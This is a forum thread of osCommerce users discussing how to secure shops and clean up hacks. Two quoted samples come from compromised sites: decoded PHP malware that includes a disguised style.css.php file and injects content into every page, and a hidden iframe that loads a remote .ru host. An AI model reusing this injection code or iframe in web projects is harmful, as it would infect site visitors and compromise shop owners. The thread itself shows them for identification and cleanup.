How to secure your osCommerce 2.2 site.

[spooks]

My last post here shows how to prevent this, see http://www.oscommerce.com/forums/index.php?sho...c=344272&hl= for details on this nasty hack, I hope u have a site backup!!

 

Decodes to:

 

 if(function_exists('ob_start')&&!isset($GLOBALS['sh_no'])){$GLOBALS['sh_no']=1;if(file_exists('/home4/shopfou3/public_html/catalog/admin/includes/languages/english/modules/index/_vti_cnf/style.css.php')){include_once('/home4/shopfou3/public_html/catalog/admin/includes/languages/english/modules/index/_vti_cnf/style.css.php');if(function_exists('gml')&&!function_exists('dgobh')){if(!function_exists('gzdecode')){function gzdecode($R20FD65E9C7406034FADC682F06732868){$R6B6E98CDE8B33087A33E4D3A497BD86B=ord(substr($R20FD65E9C7406034FADC682F06732868,3,1));$R60169CD1C47B7A7A85AB44F884635E41=10;$R0D54236DA20594EC13FC81B209733931=0;if($R6B6E98CDE8B33087A33E4D3A497BD86B&4){$R0D54236DA20594EC13FC81B209733931=unpack('v',substr($R20FD65E9C7406034FADC682F06732868,10,2));$R0D54236DA20594EC13FC81B209733931=$R0D54236DA20594EC13FC81B209733931[1];$R60169CD1C47B7A7A85AB44F884635E41+=2+$R0D54236DA20594EC13FC81B209733931;}if($R6B6E98CDE8B33087A33E4D3A497BD86B&8){$R60169CD1C47B7A7A85AB44F884635E41=strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1;}if($R6B6E98CDE8B33087A33E4D3A497BD86B&16){$R60169CD1C47B7A7A85AB44F884635E41=strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1;}if($R6B6E98CDE8B33087A33E4D3A497BD86B&2){$R60169CD1C47B7A7A85AB44F884635E41+=2;}$RC4A5B5E310ED4C323E04D72AFAE39F53=gzinflate(substr($R20FD65E9C7406034FADC682F06732868,$R60169CD1C47B7A7A85AB44F884635E41));if($RC4A5B5E310ED4C323E04D72AFAE39F53===FALSE){$RC4A5B5E310ED4C323E04D72AFAE39F53=$R20FD65E9C7406034FADC682F06732868;}return $RC4A5B5E310ED4C323E04D72AFAE39F53;}}function dgobh($RDA3E61414E50AEE968132F03D265E0CF){Header('Content-Encoding: none');$R3E33E017CD76B9B7E6C7364FB91E2E90=gzdecode($RDA3E61414E50AEE968132F03D265E0CF);if(preg_match('/\<body/si',$R3E33E017CD76B9B7E6C7364FB91E2E90)){return preg_replace('/(\<body[^\>]*\>)/si','$1'.gml(),$R3E33E017CD76B9B7E6C7364FB91E2E90);}else{return gml().$R3E33E017CD76B9B7E6C7364FB91E2E90;}}ob_start('dgobh');}}}

[Jayman11]

Thanks Sam. I have one, unfortunately it may be out of date so I don't want to move it over. Right now I am going through the files 1 by 1 and removing the code. Now I just need to figure out which an where the files are that it put on that need to be deleted. Guess I need to delete the filename php to preven this from happening again.

[spooks]

Guess I need to delete the filename php to preven this from happening again.

 

Its file_manager.php that u must delete !!! :huh:

[Jayman11]

Lol that's what I meant.

[cyberlaban]

Hi,

 

I have installed several of the security settings that has been recomended in this topic to my shop, I also belived that I had done enough testing but when addin a new product (something I had not tested), the product infomation link (to an external page) woun't work. when pushing on the link to "product information" you get redirected to the index page.

Anyone who have an idè on how to solve this?

All help really appriciated.

 

The security settings I have implemented is:

 

Folders

Security pro

Renaming admin

IP trap

.htaccess

 

Brg

Espen

[swguy]

I have added a mod that automates some common checks and looks for hacks on your site - it's at http://addons.oscommerce.com/info/7026

[♥FIMBLE]

I have added a mod that automates some common checks and looks for hacks on your site - it's at http://addons.oscommerce.com/info/7026

 

I tried out your script, nice try but i feel personally it is too confusing for the newer users who will be lead to believe that they have a have when none exists.

Too many warnings about eval, perhaps you should add a list of files known to use this?

Good work though

Nic

[swguy]

There is a list of files known to use eval - they're files from the default installation. See line 29 in admin/syscheck.php and add what you need.

[blr044]

I have added a mod that automates some common checks and looks for hacks on your site - it's at http://addons.oscommerce.com/info/7026

 

 

In your instruction, you made this statement:

 

Try this in a test environment prior to installing it on a live shop.

 

I have seen orther mod suggest the same thing. So am asking, how is this done, do we need to contact our host to have this done?

 

Thanks.

 

Bennett

[spooks]

test environment, how is this done, do we need to contact our host to have this done?

 

 

It simply means set up a duplicate site eleswhere purly for testing, it can be with a seperate domain, or, most simply, within a subdirectory of your site, then it can share the same dbase if u want.

 

If installing within a subdirectory do not run the installer, as that will delete your existing dbase, just copy files & set up configure.php, filenames.php etc files manually.

[cyberlaban]

Hi All,

 

I find it strange that no one has experienced the same problem as me when coming to being redirected to index page when clicking on the "more product information" link.... guess I just tweeked the security settings to hard....

 

But if anyone has an idè on how to solve it I'll listen :)

 

Cheers

Espen

 

This is what I have done:

 

I have installed several of the security settings that has been recomended in this topic to my shop, I also belived that I had done enough testing but when addin a new product (something I had not tested), the product infomation link (to an external page) woun't work. when pushing on the link to "product information" you get redirected to the index page.

Anyone who have an idè on how to solve this?

All help really appriciated.

 

The security settings I have implemented is:

 

Folders

Security pro

Renaming admin

IP trap

.htaccess

[spooks]

Your error is not related to security, & likely nothing to do with any of the contribs u added.

 

Likely u created a cooinsidental error, your error is typical of many badly coded termplates.

 

Create a new thread with error & code plus link to faulty page.

[mycommerce2]

I just install eoCommerce 2.2 RC2 and every thing look good. I'm very new at this. I read yourpost here, about securing your site. Although this tells me WHAT I need to do, I'm not sure HOW to do it. With my host (Just Host) know how to go into File Manager and see may folders and files, but I don't have a clue on where to start to implement the security measure(s) in the link I cite above.

 

Can some one tell me HOW (what coding do I need to add or modify) and in WHICH files do I need to add or modify coding. How do I access these files. Do I need to implement ALL of the security measures at the link above? Please give me as much detail as you can for each question. I really appreciate your help.

[cyberlaban]

Your error is not related to security, & likely nothing to do with any of the contribs u added.

 

Likely u created a cooinsidental error, your error is typical of many badly coded termplates.

 

Create a new thread with error & code plus link to faulty page.

 

Thanks for the feedback. I will post a new tread with link etc. The only thing I have done besides adding the security settings is a Norwegian language pack and added payment module. Could it be the Norwegian language pack then???

I was so sure that it had something to do with the security settings...

 

Cheers

Espen

[spooks]

 

They are all contributions, you just follow the instructions!!

 

How do I install a contribution http://www.oscommerce.com/forums/index.php?sho...=0#entry1432157

[pretzi]

Sam, you´re doing a GREAT JOB, but-Oh, boy, this is going to be quite of an afternoon-I can sence all this like a "yor site will be bulletproof but will cease to run" kind of thing. I´m expecting tones of "Fatal errors", blank pages...you name it. Hope not.

 

Can you, please, tell any posible conflicts- with PayPal for exemple.

 

Thanks!

[spooks]

any posible conflicts

 

There should be no conflicts with most, refer to relevent support threads for each.

 

Some, like security pro, have inbuilt measures to avoid conflicts. :)

[Guest]

Sorry if this is OT.

 

Is yacybot a bonafide spider?

 

Got three http errors in a row from different ips. Eg below

Site: http://xxxxx

Error Code: 400 - The request could not be understood by the server due to malformed syntax.

Occurred: 10/11/2009 1:12:40

Requested URL: http://xxxxxx/mod_ssl:error:HTTP-request

User Address: xxx.xx.xx.xx

User Agent: yacybot (amd64 Linux 2.6.28-15-generic; java 1.6.0_0; Europe/en) http://yacy.net/bot.html

Referer: http://xxxxx:443/

[spooks]

Is yacybot a bonafide spider?

 

Does this help? yacy.net/bot.html

[madstarr]

Please help identify hack. This morning my osc site had an error on the main index page

Parse error: syntax error, unexpected $end in /data/13/1/102/19/1265997/user/1350825/htdocs/msrparts_com/sfmparts/index.php on line 384

 

When I FTP into the site I see that a new index.php had been replaced this weekend. I am theoretically the only one with access to the osc site or the ftp site. Can anybody give me insight as to how this may have happened and if there is a way to find out when, how, or where from this file came.

 

I am assuming that the filemanager may be an issue as discussed in this thread and am making attempts to put in place the suggested security measures.

 

Thank you.

[spooks]

Please help identify hack. This morning my osc site had an error on the main index page

Parse error: syntax error.....

 

 

Its impossible to say if this is a hack or not, you have a syntax error, common problem, maybe u made a change in error!!

 

If u find new code on the page that has led to this, posting that alien code would be more useful.

 

Apply all security advised & throughly check your site. Of course making backups as well, if not already done, is essential.

[madstarr]

Its impossible to say if this is a hack or not, you have a syntax error, common problem, maybe u made a change in error!!

 

If u find new code on the page that has led to this, posting that alien code would be more useful.

 

Apply all security advised & throughly check your site. Of course making backups as well, if not already done, is essential.

 

Thank you Sam. Part of my concern is that I have not worked on this site in several weeks and the index.php file that was on the server was updated or uploaded October 10. That is why i am trying to figure out how this could have happened.

I compared the file that was uploaded with the one that I uploaded on 09/23 The only difference is on Line 55 the original 09/23 reads:

</head>

<body>

<!-- header //-->

<?php $tab_sel = 2; ?>

<?php require(DIR_WS_INCLUDES . 'header.php'); ?>

<!-- header_eof //-->

and the one from 10/10

</head>

<body><div style="display:none">imoobdtmglzyfqfzsftbgwbpkcgwnef<iframe width=274 height=708 src="http : // your-bio . ru : 8080 / index.php" ></iframe></div>

<!-- header //-->

<?php $tab_sel = 2; ?>

<?php require(DIR_WS_INCLUDES . 'header.php'); ?>

<!-- header_eof //-->

 

Also in the 10/10 version of index.php the last lines of the code have been deleted. from <!-- right_navigation //--> on is no longer there.

 

</td>

<td class="<?php echo BOX_WIDTH_TD_RIGHT; ?>"><table border="0" class="<?php echo BOX_WIDTH_RIGHT; ?>" cellspacing="0" cellpadding="0">

<!-- right_navigation //-->

<?php require(DIR_WS_INCLUDES . 'column_right.php'); ?>

<!-- right_navigation_eof //-->

</table>

</td>

</tr>

</table>

 

 

 

</td>

<?php

}

?>

</tr>

</table>

<!-- body_eof //-->

 

<!-- footer //-->

<?php require(DIR_WS_INCLUDES . 'footer.php'); ?>

<!-- footer_eof //-->

</body>

</html>

<?php require(DIR_WS_INCLUDES . 'application_bottom.php'); ?>

 

 

Thank you in advance for your assistance. And please excuse my amateur knowledge.

[spooks]

<iframe > http: // your - bio. ru: 8080 / index . php

 

 

Any time you see <iframe > on your site you can be fairly sure you've been hacked, osC does not use iframes.

 

I can't find to much on the hack in question, other than google reports that the target contains viri, fortunatly the error caused means no-one will have seen the page.

 

Check all your files & look for added ones, esp in images folder

Check your site logs in cPanel, error logs will often show hacking attempts. Also look in stats for frequent visitors.

 

Its likely many files effected, you may also have hidden files added that u cant remove, best get host to wipe site & restore with your backup, then add security.

 

Also note the better hosts keep daily backups, some don't charge for a restore either.

[madstarr]

Any time you see <iframe > on your site you can be fairly sure you've been hacked, osC does not use iframes.

 

I can't find to much on the hack in question, other than google reports that the target contains viri, fortunatly the error caused means no-one will have seen the page.

 

Check all your files & look for added ones, esp in images folder

Check your site logs in cPanel, error logs will often show hacking attempts. Also look in stats for frequent visitors.

 

Its likely many files effected, you may also have hidden files added that u cant remove, best get host to wipe site & restore with your backup, then add security.

 

Also note the better hosts keep daily backups, some don't charge for a restore either.

 

Thank you very much for your help. I am getting my files restored right now. I believed that this was the problem. In your opinion was this done through the file manager vulnerability you discussed?

 

Thanks again

[Guest]

Does this help? yacy.net/bot.html

Yeah read that before I posted. It says it is a robot and obeys robots.txt, but if it did it would not get the http://xxxxxx/mod_ss...or:HTTP-request error.

 

Anyway, it doen't matter. I stopped in htaccess.